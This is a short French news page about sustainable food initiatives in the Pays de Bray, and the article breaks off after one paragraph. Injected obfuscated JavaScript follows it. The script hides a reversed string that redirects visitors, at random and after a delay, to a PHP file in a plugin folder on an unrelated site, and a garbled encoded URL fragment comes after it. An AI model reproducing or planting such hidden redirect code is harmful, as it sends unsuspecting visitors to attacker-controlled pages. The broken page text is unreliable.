Initiatives d’alimentation durable en Pays de Bray

Accueil > Actualites > Initiatives d’alimentation durable en Pays de Bray

Suite à l’étude de valorisation des productions locales et la labellisation du Pays de Bray en tant que Projet Alimentaire Territorial (PAT) en avril 2021, le PETR du Pays de Bray souhaite renforcer la dynamique de valorisation et de relocalisation de son alimentation sur son territoire.

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andgo.com%2Fs%2Findex.php%3Fid%3DJTk4cSU5OHElOTklQjI%253D%26a%3DJTk3byU5MWglOTklQjI%253D||| »]